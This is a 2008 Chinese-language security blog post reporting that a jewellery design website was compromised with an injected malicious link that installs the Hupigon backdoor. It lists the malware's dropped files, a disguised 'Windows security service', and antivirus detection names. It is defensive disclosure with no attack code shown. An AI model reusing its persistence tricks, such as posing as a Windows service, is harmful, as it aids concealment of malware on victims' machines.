李玟箖飾品設計網站被值入惡意連結
2008 年 02 月 12 日 – 17:20:00李玟箖飾品設計網站被值入惡意連結,此惡意程式為 BKDR_HUPIGON.FVR,最近有瀏覽這個網頁的網友,應該要盡速檢查自己的電腦,請各位暫時不要瀏覽這個網站,以免中毒。(Credit: 匿名網友)
當進入此網站,點擊進入Blog或飾品後,會被轉址到Yahoo的部落格(如下圖所示),但此部落格目前沒有被值入惡意連結(留下空的iframe的痕跡):
惡意連結/程式碼是放置在首頁 (其他頁面可能要仔細檢查一下囉) 中的:
解碼之後,惡意連結如下所示:
Google Search查詢的結果,如下所示:
執行之後,有下面的行為:
[Added process]
C:\Program Files\Internet Explorer\IEXPLORE.EXE (此為微軟ie,但惡意程式利用它,將它隱匿起來,並且,此執行程序會將system.exe鎖住)
[Added service]
NAME: Windows security service
DISPLAY: Windows security service
FILE: C:\Program Files\systeminfo1\system.exe
[Added file]
C:\Documents and Settings\Administrator\Local Settings\Temp\g0ld.com
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C13NVBMZ\sv[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\Q08VKCK4\accessory.com[1].htm
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\Q08VKCK4\last[2].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\SEUIMLSE\%73%79%73%2E%68%74%6D[1].htm
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\SEUIMLSE\%73%79%73%2E%68%74%6D[2].htm
C:\jiji1.exe
C:\Program Files\systeminfo1\system.exe
到目前為止 (2008/2/12 @ 14:39),下面的防毒軟體可以偵測到這些惡意檔案 (僅提供參考):
system.exe:
[ Trend ], "BKDR_HUPIGON.FVR"
%73%79%73%2E%68%74%6D[1].htm:
[ WebWasher ], "BlockReason.46 (suspicious)"
g0ld.com:
[ Alpha_Gen ], "Possible_TrojDAS"
[ Kaspersky ], "ARC:Rsrc-Package, ARC:[data0000.cab]:CAB, [data0000.cab/sv.exe]:Trojan-Downloader.Win32.Agent.iph"
[ Sophos ], "[SfxArchiveData\sv.exe]:Mal/Behav-010″
[ Nod32 ], "[?CAB ?sv.exe]:a variant of Win32/TrojanDownloader.Delf.NJH trojan"
[ WebWasher ], "Trojan.Delphi.Downloader.Gen"
jiji1.exe:
[ Alpha_Gen ], "Possible_TrojDAS"
[ Kaspersky ], "ARC:Rsrc-Package, ARC:[data0000.cab]:CAB, [data0000.cab/www.exe]:Backdoor.Win32.Hupigon.aubv"
[ McAfee ], "BackDoor-AWQ"
[ McAfee_Beta ], "BackDoor-AWQ"
[ Sophos ], "[SfxArchiveData\www.exe]:Mal/Behav-058″
[ Nod32 ], "[?CAB ?www.exe]:a variant of Win32/Hupigon trojan"
[ Fortinet ], "[www.exe]:W32/Hupigon.YQ!tr.bdr"
[ Norman ], "Trojan Hupigon.gen126.dropper"
[ Rising ], "[>>www.exe>>Aspack212r]:Backdoor.Gpigeon.GEN"
[ Ewido ], "[/www.exe]:Backdoor.Hupigon.awp, [/www.exe]:Backdoor.Hupigon.awp"
[ Grisoft ], "[\www.exe]:Trojan horse BackDoor.Small.52.BQ, Trojan horse BackDoor.Small.52.BQ"
[ quickheal ], "Win32.Backdoor.Hupigon.ngr3″
[ vba32 ], "BackDoor.Pigeon.6620″
[ WebWasher ], "Trojan.Backdoor.Hupigon.ami"
last[1].exe:
[ Alpha_Gen ], "Possible_TrojDAS"
[ Kaspersky ], "ARC:Rsrc-Package, ARC:[data0000.cab]:CAB, [data0000.cab/www.exe]:Backdoor.Win32.Hupigon.aubv"
[ McAfee ], "BackDoor-AWQ"
[ McAfee_Beta ], "BackDoor-AWQ"
[ Sophos ], "[SfxArchiveData\www.exe]:Mal/Behav-058″
[ Nod32 ], "[?CAB ?www.exe]:a variant of Win32/Hupigon trojan"
[ Fortinet ], "[www.exe]:W32/Hupigon.YQ!tr.bdr"
[ Norman ], "Trojan Hupigon.gen126.dropper"
[ Rising ], "[>>www.exe>>Aspack212r]:Backdoor.Gpigeon.GEN"
[ Ewido ], "[/www.exe]:Backdoor.Hupigon.awp, [/www.exe]:Backdoor.Hupigon.awp"
[ Grisoft ], "[\www.exe]:Trojan horse BackDoor.Small.52.BQ, Trojan horse BackDoor.Small.52.BQ"
[ quickheal ], "Win32.Backdoor.Hupigon.ngr3″
[ vba32 ], "BackDoor.Pigeon.6620″
[ WebWasher ], "Trojan.Backdoor.Hupigon.ami"
sv[1].exe:
[ Alpha_Gen ], "Possible_TrojDAS"
[ Kaspersky ], "ARC:Rsrc-Package, ARC:[data0000.cab]:CAB, [data0000.cab/sv.exe]:Trojan-Downloader.Win32.Agent.iph"
[ Sophos ], "[SfxArchiveData\sv.exe]:Mal/Behav-010″
[ Nod32 ], "[?CAB ?sv.exe]:a variant of Win32/TrojanDownloader.Delf.NJH trojan"
[ WebWasher ], "Trojan.Delphi.Downloader.Gen"
“李玟箖飾品設計網站被值入惡意連結” 目前有 2 迴響
請問一下,播放影片的 codec 為何~
感謝!
By Vincent on 2008 年 02 月 13 日 - 10:43:00
可以在VMWARE網站上下載此codec:
http://www.vmware.com/download/eula/moviedecoder_v55.html
By Roger on 2008 年 02 月 14 日 - 15:25:00